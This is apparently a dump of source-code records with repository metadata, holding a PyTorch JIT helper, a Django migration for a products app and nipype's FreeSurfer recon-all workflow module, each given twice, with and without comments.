    """Context manager that globally hides source ranges when printing
    graphs, restoring the previous setting on exit."""
    old_enable_source_ranges = torch._C.Graph.global_print_source_ranges  # type: ignore[attr-defined]
    try:
        torch._C.Graph.set_global_print_source_ranges(False)  # type: ignore[attr-defined]
        yield
    finally:
        # Restore the caller's configuration even if the body raised.
        torch._C.Graph.set_global_print_source_ranges(old_enable_source_ranges)  # type: ignore[attr-defined]
# Fail fast at import time if the JIT C++ runtime cannot be initialized.
if not torch._C._jit_init():
    raise RuntimeError("JIT initialization failed")
| true | true |
f7fa590bbaf628ff0d821095d8057efca299ba7b | 1,588 | py | Python | scholariumat/products/migrations/0002_auto_20180924_1351.py | valuehack/scholariumat | 47c13f3429b95b9ad5ca59b45cf971895260bb5c | [
"MIT"
] | null | null | null | scholariumat/products/migrations/0002_auto_20180924_1351.py | valuehack/scholariumat | 47c13f3429b95b9ad5ca59b45cf971895260bb5c | [
"MIT"
] | 232 | 2018-06-30T11:40:52.000Z | 2020-04-29T23:55:41.000Z | scholariumat/products/migrations/0002_auto_20180924_1351.py | valuehack/scholariumat | 47c13f3429b95b9ad5ca59b45cf971895260bb5c | [
"MIT"
] | 3 | 2018-05-31T12:57:03.000Z | 2020-02-27T16:25:44.000Z | # Generated by Django 2.0.8 on 2018-09-24 11:51
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Adds the relations between the products models and the users app;
    deferred from 0001 so both apps' initial tables exist first."""

    initial = True

    dependencies = [
        # Both apps' initial tables must exist before these links.
        ('users', '0001_initial'),
        ('products', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='purchase',
            name='profile',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Profile'),
        ),
        migrations.AddField(
            model_name='item',
            name='product',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='products.Product'),
        ),
        migrations.AddField(
            model_name='item',
            name='requests',
            field=models.ManyToManyField(blank=True, editable=False, related_name='item_requests', to='users.Profile'),
        ),
        migrations.AddField(
            model_name='item',
            name='type',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='products.ItemType', verbose_name='Typ'),
        ),
        migrations.AddField(
            model_name='fileattachment',
            name='item',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='products.Item'),
        ),
        migrations.AddField(
            model_name='fileattachment',
            name='type',
            # PROTECT: an attachment type cannot be deleted while
            # attachments still reference it.
            field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='products.AttachmentType'),
        ),
    ]
| 33.083333 | 125 | 0.602645 |
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Wires up the foreign keys and M2M relations that reference the
    users app; depends on both apps' initial migrations."""

    initial = True

    dependencies = [
        ('users', '0001_initial'),
        ('products', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='purchase',
            name='profile',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Profile'),
        ),
        migrations.AddField(
            model_name='item',
            name='product',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='products.Product'),
        ),
        migrations.AddField(
            model_name='item',
            name='requests',
            field=models.ManyToManyField(blank=True, editable=False, related_name='item_requests', to='users.Profile'),
        ),
        migrations.AddField(
            model_name='item',
            name='type',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='products.ItemType', verbose_name='Typ'),
        ),
        migrations.AddField(
            model_name='fileattachment',
            name='item',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='products.Item'),
        ),
        migrations.AddField(
            model_name='fileattachment',
            name='type',
            # PROTECT prevents deleting a type still in use.
            field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='products.AttachmentType'),
        ),
    ]
| true | true |
f7fa593a4995e101544e3415266dad0ef673d73c | 28,316 | py | Python | nipype/workflows/smri/freesurfer/recon.py | felixsc1/nipype | e722d6170593583f16ddfcb95473e5d30b5f1d7c | [
"Apache-2.0"
] | 8 | 2019-05-29T09:38:30.000Z | 2021-01-20T03:36:59.000Z | nipype/workflows/smri/freesurfer/recon.py | felixsc1/nipype | e722d6170593583f16ddfcb95473e5d30b5f1d7c | [
"Apache-2.0"
] | 12 | 2021-03-09T03:01:16.000Z | 2022-03-11T23:59:36.000Z | nipype/workflows/smri/freesurfer/recon.py | felixsc1/nipype | e722d6170593583f16ddfcb95473e5d30b5f1d7c | [
"Apache-2.0"
] | 1 | 2020-07-17T12:49:49.000Z | 2020-07-17T12:49:49.000Z | # -*- coding: utf-8 -*-
from __future__ import (print_function, division, unicode_literals,
absolute_import)
from ....pipeline import engine as pe
from ....interfaces import freesurfer as fs
from ....interfaces import utility as niu
from .autorecon1 import create_AutoRecon1
from .autorecon2 import create_AutoRecon2
from .autorecon3 import create_AutoRecon3
from ....interfaces.freesurfer import AddXFormToHeader, Info
from ....interfaces.io import DataSink
from .utils import getdefaultconfig
from .... import logging
logger = logging.getLogger('nipype.workflow')
def create_skullstripped_recon_flow(name="skullstripped_recon_all"):
    """Performs recon-all on volumes that are already skull stripped.
    FreeSurfer fails to perform skullstripping on some volumes (especially
    MP2RAGE). This can be avoided by doing skullstripping before running
    recon-all (using for example SPECTRE algorithm).

    Example
    -------
    >>> from nipype.workflows.smri.freesurfer import create_skullstripped_recon_flow
    >>> recon_flow = create_skullstripped_recon_flow()
    >>> recon_flow.inputs.inputspec.subject_id = 'subj1'
    >>> recon_flow.inputs.inputspec.T1_files = 'T1.nii.gz'
    >>> recon_flow.run()  # doctest: +SKIP


    Inputs::
           inputspec.T1_files : skullstripped T1_files (mandatory)
           inputspec.subject_id : freesurfer subject id (optional)
           inputspec.subjects_dir : freesurfer subjects directory (optional)

    Outputs::

           outputspec.subject_id : freesurfer subject id
           outputspec.subjects_dir : freesurfer subjects directory
    """
    wf = pe.Workflow(name=name)

    inputnode = pe.Node(
        niu.IdentityInterface(
            fields=['subject_id', 'subjects_dir', 'T1_files']),
        name='inputspec')

    # Run only the autorecon1 stage, skipping FreeSurfer's own skull
    # stripping since the inputs are already stripped.
    autorecon1 = pe.Node(fs.ReconAll(), name="autorecon1")
    autorecon1.plugin_args = {'submit_specs': 'request_memory = 2500'}
    autorecon1.inputs.directive = "autorecon1"
    autorecon1.inputs.args = "-noskullstrip"
    # Force a clean rerun of this stage rather than resuming a previous
    # (possibly partial) recon-all run.
    autorecon1._interface._can_resume = False

    wf.connect(inputnode, "T1_files", autorecon1, "T1_files")
    wf.connect(inputnode, "subjects_dir", autorecon1, "subjects_dir")
    wf.connect(inputnode, "subject_id", autorecon1, "subject_id")

    def link_masks(subjects_dir, subject_id):
        # recon-all expects brainmask files that the skipped skullstrip
        # step would have produced; symlink them to T1.mgz instead.
        import os
        os.symlink(
            os.path.join(subjects_dir, subject_id, "mri", "T1.mgz"),
            os.path.join(subjects_dir, subject_id, "mri",
                         "brainmask.auto.mgz"))
        os.symlink(
            os.path.join(subjects_dir, subject_id, "mri",
                         "brainmask.auto.mgz"),
            os.path.join(subjects_dir, subject_id, "mri", "brainmask.mgz"))
        return subjects_dir, subject_id

    masks = pe.Node(
        niu.Function(
            input_names=['subjects_dir', 'subject_id'],
            output_names=['subjects_dir', 'subject_id'],
            function=link_masks),
        name="link_masks")

    wf.connect(autorecon1, "subjects_dir", masks, "subjects_dir")
    wf.connect(autorecon1, "subject_id", masks, "subject_id")

    # Resume the remaining recon-all stages after the masks are in place.
    autorecon_resume = pe.Node(fs.ReconAll(), name="autorecon_resume")
    autorecon_resume.plugin_args = {'submit_specs': 'request_memory = 2500'}
    autorecon_resume.inputs.args = "-no-isrunning"
    wf.connect(masks, "subjects_dir", autorecon_resume, "subjects_dir")
    wf.connect(masks, "subject_id", autorecon_resume, "subject_id")

    outputnode = pe.Node(
        niu.IdentityInterface(fields=['subject_id', 'subjects_dir']),
        name='outputspec')

    wf.connect(autorecon_resume, "subjects_dir", outputnode, "subjects_dir")
    wf.connect(autorecon_resume, "subject_id", outputnode, "subject_id")
    return wf
def create_reconall_workflow(name="ReconAll", plugin_args=None):
"""Creates the ReconAll workflow in Nipype. This workflow is designed to
run the same commands as FreeSurfer's reconall script but with the added
features that a Nipype workflow provides. Before running this workflow, it
is necessary to have the FREESURFER_HOME environmental variable set to the
directory containing the version of FreeSurfer to be used in this workflow.
Example
-------
>>> from nipype.workflows.smri.freesurfer import create_reconall_workflow
>>> recon_all = create_reconall_workflow()
>>> recon_all.inputs.inputspec.subject_id = 'subj1'
>>> recon_all.inputs.inputspec.subjects_dir = '.'
>>> recon_all.inputs.inputspec.T1_files = 'T1.nii.gz'
>>> recon_all.run() # doctest: +SKIP
Inputs::
inputspec.subjects_dir : subjects directory (mandatory)
inputspec.subject_id : name of subject (mandatory)
inputspec.T1_files : T1 files (mandatory)
inputspec.T2_file : T2 file (optional)
inputspec.FLAIR_file : FLAIR file (optional)
inputspec.cw256 : Conform inputs to 256 FOV (optional)
inputspec.num_threads: Number of threads on nodes that utilize OpenMP (default=1)
plugin_args : Dictionary of plugin args to set to nodes that utilize OpenMP (optional)
Outputs::
postdatasink_outputspec.subject_id : name of the datasinked output folder in the subjects directory
Note:
The input subject_id is not passed to the commands in the workflow. Commands
that require subject_id are reading implicit inputs from
{SUBJECTS_DIR}/{subject_id}. For those commands the subject_id is set to the
default value and SUBJECTS_DIR is set to the node directory. The implicit
inputs are then copied to the node directory in order to mimic a SUBJECTS_DIR
structure. For example, if the command implicitly reads in brainmask.mgz, the
interface would copy that input file to
{node_dir}/{subject_id}/mri/brainmask.mgz and set SUBJECTS_DIR to node_dir.
The workflow only uses the input subject_id to datasink the outputs to
{subjects_dir}/{subject_id}.
"""
reconall = pe.Workflow(name=name)
inputspec = pe.Node(
niu.IdentityInterface(fields=[
'subject_id', 'subjects_dir', 'T1_files', 'T2_file', 'FLAIR_file',
'num_threads', 'cw256', 'reg_template', 'reg_template_withskull',
'lh_atlas', 'rh_atlas', 'lh_classifier1', 'rh_classifier1',
'lh_classifier2', 'rh_classifier2', 'lh_classifier3',
'rh_classifier3', 'lookup_table', 'wm_lookup_table',
'src_subject_id', 'src_subject_dir', 'color_table', 'awk_file'
]),
run_without_submitting=True,
name='inputspec')
# check freesurfer version and set parameters
fs_version_full = Info.version()
if fs_version_full and ('v6.0' in fs_version_full
or 'dev' in fs_version_full):
# assuming that dev is 6.0
fsvernum = 6.0
fs_version = 'v6.0'
th3 = True
shrink = 2
distance = 200 # 3T should be 50
stop = 0.0001
exvivo = True
entorhinal = True
rb_date = "2014-08-21"
else:
# 5.3 is default
fsvernum = 5.3
if fs_version_full:
if 'v5.3' in fs_version_full:
fs_version = 'v5.3'
else:
fs_version = fs_version_full.split('-')[-1]
logger.info(("Warning: Workflow may not work properly if "
"FREESURFER_HOME environmental variable is not "
"set or if you are using an older version of "
"FreeSurfer"))
else:
fs_version = 5.3 # assume version 5.3
th3 = False
shrink = None
distance = 50
stop = None
exvivo = False
entorhinal = False
rb_date = "2008-03-26"
logger.info("FreeSurfer Version: {0}".format(fs_version))
def setconfig(reg_template=None,
reg_template_withskull=None,
lh_atlas=None,
rh_atlas=None,
lh_classifier1=None,
rh_classifier1=None,
lh_classifier2=None,
rh_classifier2=None,
lh_classifier3=None,
rh_classifier3=None,
src_subject_id=None,
src_subject_dir=None,
color_table=None,
lookup_table=None,
wm_lookup_table=None,
awk_file=None,
rb_date=None):
"""Set optional configurations to the default"""
def checkarg(arg, default):
"""Returns the value if defined; otherwise default"""
if arg:
return arg
else:
return default
defaultconfig = getdefaultconfig(exitonfail=True, rb_date=rb_date)
# set the default template and classifier files
reg_template = checkarg(reg_template,
defaultconfig['registration_template'])
reg_template_withskull = checkarg(
reg_template_withskull,
defaultconfig['registration_template_withskull'])
lh_atlas = checkarg(lh_atlas, defaultconfig['lh_atlas'])
rh_atlas = checkarg(rh_atlas, defaultconfig['rh_atlas'])
lh_classifier1 = checkarg(lh_classifier1,
defaultconfig['lh_classifier'])
rh_classifier1 = checkarg(rh_classifier1,
defaultconfig['rh_classifier'])
lh_classifier2 = checkarg(lh_classifier2,
defaultconfig['lh_classifier2'])
rh_classifier2 = checkarg(rh_classifier2,
defaultconfig['rh_classifier2'])
lh_classifier3 = checkarg(lh_classifier3,
defaultconfig['lh_classifier3'])
rh_classifier3 = checkarg(rh_classifier3,
defaultconfig['rh_classifier3'])
src_subject_id = checkarg(src_subject_id,
defaultconfig['src_subject_id'])
src_subject_dir = checkarg(src_subject_dir,
defaultconfig['src_subject_dir'])
color_table = checkarg(color_table, defaultconfig['AvgColorTable'])
lookup_table = checkarg(lookup_table, defaultconfig['LookUpTable'])
wm_lookup_table = checkarg(wm_lookup_table,
defaultconfig['WMLookUpTable'])
awk_file = checkarg(awk_file, defaultconfig['awk_file'])
return reg_template, reg_template_withskull, lh_atlas, rh_atlas, \
lh_classifier1, rh_classifier1, lh_classifier2, rh_classifier2, \
lh_classifier3, rh_classifier3, src_subject_id, src_subject_dir, \
color_table, lookup_table, wm_lookup_table, awk_file
# list of params to check
params = [
'reg_template', 'reg_template_withskull', 'lh_atlas', 'rh_atlas',
'lh_classifier1', 'rh_classifier1', 'lh_classifier2', 'rh_classifier2',
'lh_classifier3', 'rh_classifier3', 'src_subject_id',
'src_subject_dir', 'color_table', 'lookup_table', 'wm_lookup_table',
'awk_file'
]
config_node = pe.Node(
niu.Function(params + ['rb_date'], params, setconfig), name="config")
config_node.inputs.rb_date = rb_date
for param in params:
reconall.connect(inputspec, param, config_node, param)
# create AutoRecon1
ar1_wf, ar1_outputs = create_AutoRecon1(
plugin_args=plugin_args,
stop=stop,
distance=distance,
shrink=shrink,
fsvernum=fsvernum)
# connect inputs for AutoRecon1
reconall.connect([(inputspec, ar1_wf, [
('T1_files', 'inputspec.T1_files'), ('T2_file', 'inputspec.T2_file'),
('FLAIR_file', 'inputspec.FLAIR_file'),
('num_threads', 'inputspec.num_threads'), ('cw256', 'inputspec.cw256')
]), (config_node, ar1_wf, [('reg_template_withskull',
'inputspec.reg_template_withskull'),
('awk_file', 'inputspec.awk_file')])])
# create AutoRecon2
ar2_wf, ar2_outputs = create_AutoRecon2(
plugin_args=plugin_args,
fsvernum=fsvernum,
stop=stop,
shrink=shrink,
distance=distance)
# connect inputs for AutoRecon2
reconall.connect(
[(inputspec, ar2_wf, [('num_threads', 'inputspec.num_threads')]),
(config_node, ar2_wf, [('reg_template_withskull',
'inputspec.reg_template_withskull'),
('reg_template', 'inputspec.reg_template')]),
(ar1_wf, ar2_wf, [('outputspec.brainmask', 'inputspec.brainmask'),
('outputspec.talairach', 'inputspec.transform'),
('outputspec.orig', 'inputspec.orig')])])
if fsvernum < 6:
reconall.connect([(ar1_wf, ar2_wf, [('outputspec.nu',
'inputspec.nu')])])
# create AutoRecon3
ar3_wf, ar3_outputs = create_AutoRecon3(
plugin_args=plugin_args,
th3=th3,
exvivo=exvivo,
entorhinal=entorhinal,
fsvernum=fsvernum)
# connect inputs for AutoRecon3
reconall.connect(
[(config_node, ar3_wf,
[('lh_atlas', 'inputspec.lh_atlas'),
('rh_atlas', 'inputspec.rh_atlas'), ('lh_classifier1',
'inputspec.lh_classifier1'),
('rh_classifier1',
'inputspec.rh_classifier1'), ('lh_classifier2',
'inputspec.lh_classifier2'),
('rh_classifier2',
'inputspec.rh_classifier2'), ('lh_classifier3',
'inputspec.lh_classifier3'),
('rh_classifier3',
'inputspec.rh_classifier3'), ('lookup_table',
'inputspec.lookup_table'),
('wm_lookup_table',
'inputspec.wm_lookup_table'), ('src_subject_dir',
'inputspec.src_subject_dir'),
('src_subject_id',
'inputspec.src_subject_id'), ('color_table',
'inputspec.color_table')]),
(ar1_wf, ar3_wf, [('outputspec.brainmask', 'inputspec.brainmask'),
('outputspec.talairach', 'inputspec.transform'),
('outputspec.orig',
'inputspec.orig_mgz'), ('outputspec.rawavg',
'inputspec.rawavg')]),
(ar2_wf, ar3_wf,
[('outputspec.aseg_presurf', 'inputspec.aseg_presurf'),
('outputspec.brain_finalsurfs',
'inputspec.brain_finalsurfs'), ('outputspec.wm', 'inputspec.wm'),
('outputspec.filled', 'inputspec.filled'), ('outputspec.norm',
'inputspec.norm')])])
for hemi in ('lh', 'rh'):
reconall.connect([(ar2_wf, ar3_wf,
[('outputspec.{0}_inflated'.format(hemi),
'inputspec.{0}_inflated'.format(hemi)),
('outputspec.{0}_smoothwm'.format(hemi),
'inputspec.{0}_smoothwm'.format(hemi)),
('outputspec.{0}_white'.format(hemi),
'inputspec.{0}_white'.format(hemi)),
('outputspec.{0}_cortex'.format(hemi),
'inputspec.{0}_cortex_label'.format(hemi)),
('outputspec.{0}_area'.format(hemi),
'inputspec.{0}_area'.format(hemi)),
('outputspec.{0}_curv'.format(hemi),
'inputspec.{0}_curv'.format(hemi)),
('outputspec.{0}_sulc'.format(hemi),
'inputspec.{0}_sulc'.format(hemi)),
('outputspec.{0}_orig_nofix'.format(hemi),
'inputspec.{0}_orig_nofix'.format(hemi)),
('outputspec.{0}_orig'.format(hemi),
'inputspec.{0}_orig'.format(hemi)),
('outputspec.{0}_white_H'.format(hemi),
'inputspec.{0}_white_H'.format(hemi)),
('outputspec.{0}_white_K'.format(hemi),
'inputspec.{0}_white_K'.format(hemi))])])
# Add more outputs to outputspec
outputs = ar1_outputs + ar2_outputs + ar3_outputs
outputspec = pe.Node(
niu.IdentityInterface(fields=outputs, mandatory_inputs=True),
name="outputspec")
for outfields, wf in [(ar1_outputs, ar1_wf), (ar2_outputs, ar2_wf),
(ar3_outputs, ar3_wf)]:
for field in outfields:
reconall.connect([(wf, outputspec, [('outputspec.' + field,
field)])])
# PreDataSink: Switch Transforms to datasinked transfrom
# The transforms in the header files of orig.mgz, orig_nu.mgz, and nu.mgz
# are all reference a transform in the cache directory. We need to rewrite the
# headers to reference the datasinked transform
# get the filepath to where the transform will be datasinked
def getDSTransformPath(subjects_dir, subject_id):
import os
transform = os.path.join(subjects_dir, subject_id, 'mri', 'transforms',
'talairach.xfm')
return transform
dstransform = pe.Node(
niu.Function(['subjects_dir', 'subject_id'], ['transform'],
getDSTransformPath),
name="PreDataSink_GetTransformPath")
reconall.connect([(inputspec, dstransform,
[('subjects_dir', 'subjects_dir'), ('subject_id',
'subject_id')])])
# add the data sink transfrom location to the headers
predatasink_orig = pe.Node(AddXFormToHeader(), name="PreDataSink_Orig")
predatasink_orig.inputs.copy_name = True
predatasink_orig.inputs.out_file = 'orig.mgz'
reconall.connect([(outputspec, predatasink_orig, [('orig', 'in_file')]),
(dstransform, predatasink_orig, [('transform',
'transform')])])
predatasink_orig_nu = pe.Node(
AddXFormToHeader(), name="PreDataSink_Orig_Nu")
predatasink_orig_nu.inputs.copy_name = True
predatasink_orig_nu.inputs.out_file = 'orig_nu.mgz'
reconall.connect(
[(outputspec, predatasink_orig_nu, [('orig_nu', 'in_file')]),
(dstransform, predatasink_orig_nu, [('transform', 'transform')])])
predatasink_nu = pe.Node(AddXFormToHeader(), name="PreDataSink_Nu")
predatasink_nu.inputs.copy_name = True
predatasink_nu.inputs.out_file = 'nu.mgz'
reconall.connect([(outputspec, predatasink_nu, [('nu', 'in_file')]),
(dstransform, predatasink_nu, [('transform',
'transform')])])
# Datasink outputs
datasink = pe.Node(DataSink(), name="DataSink")
datasink.inputs.parameterization = False
reconall.connect([(inputspec, datasink,
[('subjects_dir', 'base_directory'), ('subject_id',
'container')])])
# assign datasink inputs
reconall.connect([
(predatasink_orig, datasink, [('out_file', 'mri.@orig')]),
(predatasink_orig_nu, datasink, [('out_file', 'mri.@orig_nu')]),
(predatasink_nu, datasink, [('out_file', 'mri.@nu')]),
(outputspec, datasink, [
('origvols', 'mri.orig'),
('t2_raw', 'mri.orig.@t2raw'),
('flair', 'mri.orig.@flair'),
('rawavg', 'mri.@rawavg'),
('talairach_auto', 'mri.transforms.@tal_auto'),
('talairach', 'mri.transforms.@tal'),
('t1', 'mri.@t1'),
('brainmask_auto', 'mri.@brainmask_auto'),
('brainmask', 'mri.@brainmask'),
('braintemplate', 'mri.@braintemplate'),
('tal_lta', 'mri.transforms.@tal_lta'),
('norm', 'mri.@norm'),
('ctrl_pts', 'mri.@ctrl_pts'),
('tal_m3z', 'mri.transforms.@tal_m3z'),
('nu_noneck', 'mri.@nu_noneck'),
('talskull2', 'mri.transforms.@talskull2'),
('aseg_noCC', 'mri.@aseg_noCC'),
('cc_up', 'mri.transforms.@cc_up'),
('aseg_auto', 'mri.@aseg_auto'),
('aseg_presurf', 'mri.@aseg_presuf'),
('brain', 'mri.@brain'),
('brain_finalsurfs', 'mri.@brain_finalsurfs'),
('wm_seg', 'mri.@wm_seg'),
('wm_aseg', 'mri.@wm_aseg'),
('wm', 'mri.@wm'),
('filled', 'mri.@filled'),
('ponscc_log', 'mri.@ponscc_log'),
('lh_orig_nofix', 'surf.@lh_orig_nofix'),
('lh_orig', 'surf.@lh_orig'),
('lh_smoothwm_nofix', 'surf.@lh_smoothwm_nofix'),
('lh_inflated_nofix', 'surf.@lh_inflated_nofix'),
('lh_qsphere_nofix', 'surf.@lh_qsphere_nofix'),
('lh_white', 'surf.@lh_white'),
('lh_curv', 'surf.@lh_curv'),
('lh_area', 'surf.@lh_area'),
('lh_cortex', 'label.@lh_cortex'),
('lh_smoothwm', 'surf.@lh_smoothwm'),
('lh_sulc', 'surf.@lh_sulc'),
('lh_inflated', 'surf.@lh_inflated'),
('lh_white_H', 'surf.@lh_white_H'),
('lh_white_K', 'surf.@lh_white_K'),
('lh_inflated_H', 'surf.@lh_inflated_H'),
('lh_inflated_K', 'surf.@lh_inflated_K'),
('lh_curv_stats', 'stats.@lh_curv_stats'),
('rh_orig_nofix', 'surf.@rh_orig_nofix'),
('rh_orig', 'surf.@rh_orig'),
('rh_smoothwm_nofix', 'surf.@rh_smoothwm_nofix'),
('rh_inflated_nofix', 'surf.@rh_inflated_nofix'),
('rh_qsphere_nofix', 'surf.@rh_qsphere_nofix'),
('rh_white', 'surf.@rh_white'),
('rh_curv', 'surf.@rh_curv'),
('rh_area', 'surf.@rh_area'),
('rh_cortex', 'label.@rh_cortex'),
('rh_smoothwm', 'surf.@rh_smoothwm'),
('rh_sulc', 'surf.@rh_sulc'),
('rh_inflated', 'surf.@rh_inflated'),
('rh_white_H', 'surf.@rh_white_H'),
('rh_white_K', 'surf.@rh_white_K'),
('rh_inflated_H', 'surf.@rh_inflated_H'),
('rh_inflated_K', 'surf.@rh_inflated_K'),
('rh_curv_stats', 'stats.@rh_curv_stats'),
('lh_aparc_annot_ctab', 'label.@aparc_annot_ctab'),
('aseg', 'mri.@aseg'),
('wmparc', 'mri.@wmparc'),
('wmparc_stats', 'stats.@wmparc_stats'),
('aseg_stats', 'stats.@aseg_stats'),
('aparc_a2009s_aseg', 'mri.@aparc_a2009s_aseg'),
('aparc_aseg', 'mri.@aparc_aseg'),
('aseg_presurf_hypos', 'mri.@aseg_presurf_hypos'),
('ribbon', 'mri.@ribbon'),
('rh_ribbon', 'mri.@rh_ribbon'),
('lh_ribbon', 'mri.@lh_ribbon'),
('lh_sphere', 'surf.@lh_sphere'),
('rh_sphere', 'surf.@rh_sphere'),
('lh_sphere_reg', 'surf.@lh_sphere_reg'),
('rh_sphere_reg', 'surf.@rh_sphere_reg'),
('lh_jacobian_white', 'surf.@lh_jacobian_white'),
('rh_jacobian_white', 'surf.@rh_jacobian_white'),
('lh_avg_curv', 'surf.@lh_avg_curv'),
('rh_avg_curv', 'surf.@rh_avg_curv'),
('lh_aparc_annot', 'label.@lh_aparc_annot'),
('rh_aparc_annot', 'label.@rh_aparc_annot'),
('lh_area_pial', 'surf.@lh_area_pial'),
('rh_area_pial', 'surf.@rh_area_pial'),
('lh_curv_pial', 'surf.@lh_curv_pial'),
('rh_curv_pial', 'surf.@rh_curv_pial'),
('lh_pial', 'surf.@lh_pial'),
('rh_pial', 'surf.@rh_pial'),
('lh_thickness_pial', 'surf.@lh_thickness_pial'),
('rh_thickness_pial', 'surf.@rh_thickness_pial'),
('lh_area_mid', 'surf.@lh_area_mid'),
('rh_area_mid', 'surf.@rh_area_mid'),
('lh_volume', 'surf.@lh_volume'),
('rh_volume', 'surf.@rh_volume'),
('lh_aparc_annot_ctab', 'label.@lh_aparc_annot_ctab'),
('rh_aparc_annot_ctab', 'label.@rh_aparc_annot_ctab'),
('lh_aparc_stats', 'stats.@lh_aparc_stats'),
('rh_aparc_stats', 'stats.@rh_aparc_stats'),
('lh_aparc_pial_stats', 'stats.@lh_aparc_pial_stats'),
('rh_aparc_pial_stats', 'stats.@rh_aparc_pial_stats'),
('lh_aparc_a2009s_annot', 'label.@lh_aparc_a2009s_annot'),
('rh_aparc_a2009s_annot', 'label.@rh_aparc_a2009s_annot'),
('lh_aparc_a2009s_annot_ctab',
'label.@lh_aparc_a2009s_annot_ctab'),
('rh_aparc_a2009s_annot_ctab',
'label.@rh_aparc_a2009s_annot_ctab'),
('lh_aparc_a2009s_annot_stats',
'stats.@lh_aparc_a2009s_annot_stats'),
('rh_aparc_a2009s_annot_stats',
'stats.@rh_aparc_a2009s_annot_stats'),
('lh_aparc_DKTatlas40_annot', 'label.@lh_aparc_DKTatlas40_annot'),
('rh_aparc_DKTatlas40_annot', 'label.@rh_aparc_DKTatlas40_annot'),
('lh_aparc_DKTatlas40_annot_ctab',
'label.@lh_aparc_DKTatlas40_annot_ctab'),
('rh_aparc_DKTatlas40_annot_ctab',
'label.@rh_aparc_DKTatlas40_annot_ctab'),
('lh_aparc_DKTatlas40_annot_stats',
'stats.@lh_aparc_DKTatlas40_annot_stats'),
('rh_aparc_DKTatlas40_annot_stats',
'stats.@rh_aparc_DKTatlas40_annot_stats'),
('lh_wg_pct_mgh', 'surf.@lh_wg_pct_mgh'),
('rh_wg_pct_mgh', 'surf.@rh_wg_pct_mgh'),
('lh_wg_pct_stats', 'stats.@lh_wg_pct_stats'),
('rh_wg_pct_stats', 'stats.@rh_wg_pct_stats'),
('lh_pctsurfcon_log', 'log.@lh_pctsurfcon_log'),
('rh_pctsurfcon_log', 'log.@rh_pctsurfcon_log'),
('lh_BAMaps_stats', 'stats.@lh_BAMaps_stats'),
('lh_color', 'label.@lh_color'),
('lh_thresh_BAMaps_stats', 'stats.@lh_thresh_BAMaps_stats'),
('lh_thresh_color', 'label.@lh_thresh_color'),
('rh_BAMaps_stats', 'stats.@rh_BAMaps_stats'),
('rh_color', 'label.@rh_color'),
('rh_thresh_BAMaps_stats', 'stats.@rh_thresh_BAMaps_stats'),
('rh_thresh_color', 'label.@rh_thresh_color'),
('lh_BAMaps_labels', 'label.@lh_BAMaps_labels'),
('lh_thresh_BAMaps_labels', 'label.@lh_thresh_BAMaps_labels'),
('rh_BAMaps_labels', 'label.@rh_BAMaps_labels'),
('rh_thresh_BAMaps_labels', 'label.@rh_thresh_BAMaps_labels'),
('lh_BAMaps_annotation', 'label.@lh_BAMaps_annotation'),
('lh_thresh_BAMaps_annotation',
'label.@lh_thresh_BAMaps_annotation'),
('rh_BAMaps_annotation', 'label.@rh_BAMaps_annotation'),
('rh_thresh_BAMaps_annotation',
'label.@rh_thresh_BAMaps_annotation'),
]),
])
# compeltion node
# since recon-all outputs so many files a completion node is added
# that will output the subject_id once the workflow has completed
def completemethod(datasinked_files, subject_id):
print("recon-all has finished executing for subject: {0}".format(
subject_id))
return subject_id
completion = pe.Node(
niu.Function(['datasinked_files', 'subject_id'], ['subject_id'],
completemethod),
name="Completion")
# create a special identity interface for outputing the subject_id
postds_outputspec = pe.Node(
niu.IdentityInterface(['subject_id']), name="postdatasink_outputspec")
reconall.connect(
[(datasink, completion, [('out_file', 'datasinked_files')]),
(inputspec, completion, [('subject_id', 'subject_id')]),
(completion, postds_outputspec, [('subject_id', 'subject_id')])])
return reconall
| 46.803306 | 110 | 0.583945 |
from __future__ import (print_function, division, unicode_literals,
absolute_import)
from ....pipeline import engine as pe
from ....interfaces import freesurfer as fs
from ....interfaces import utility as niu
from .autorecon1 import create_AutoRecon1
from .autorecon2 import create_AutoRecon2
from .autorecon3 import create_AutoRecon3
from ....interfaces.freesurfer import AddXFormToHeader, Info
from ....interfaces.io import DataSink
from .utils import getdefaultconfig
from .... import logging
logger = logging.getLogger('nipype.workflow')
def create_skullstripped_recon_flow(name="skullstripped_recon_all"):
wf = pe.Workflow(name=name)
inputnode = pe.Node(
niu.IdentityInterface(
fields=['subject_id', 'subjects_dir', 'T1_files']),
name='inputspec')
autorecon1 = pe.Node(fs.ReconAll(), name="autorecon1")
autorecon1.plugin_args = {'submit_specs': 'request_memory = 2500'}
autorecon1.inputs.directive = "autorecon1"
autorecon1.inputs.args = "-noskullstrip"
autorecon1._interface._can_resume = False
wf.connect(inputnode, "T1_files", autorecon1, "T1_files")
wf.connect(inputnode, "subjects_dir", autorecon1, "subjects_dir")
wf.connect(inputnode, "subject_id", autorecon1, "subject_id")
def link_masks(subjects_dir, subject_id):
import os
os.symlink(
os.path.join(subjects_dir, subject_id, "mri", "T1.mgz"),
os.path.join(subjects_dir, subject_id, "mri",
"brainmask.auto.mgz"))
os.symlink(
os.path.join(subjects_dir, subject_id, "mri",
"brainmask.auto.mgz"),
os.path.join(subjects_dir, subject_id, "mri", "brainmask.mgz"))
return subjects_dir, subject_id
masks = pe.Node(
niu.Function(
input_names=['subjects_dir', 'subject_id'],
output_names=['subjects_dir', 'subject_id'],
function=link_masks),
name="link_masks")
wf.connect(autorecon1, "subjects_dir", masks, "subjects_dir")
wf.connect(autorecon1, "subject_id", masks, "subject_id")
autorecon_resume = pe.Node(fs.ReconAll(), name="autorecon_resume")
autorecon_resume.plugin_args = {'submit_specs': 'request_memory = 2500'}
autorecon_resume.inputs.args = "-no-isrunning"
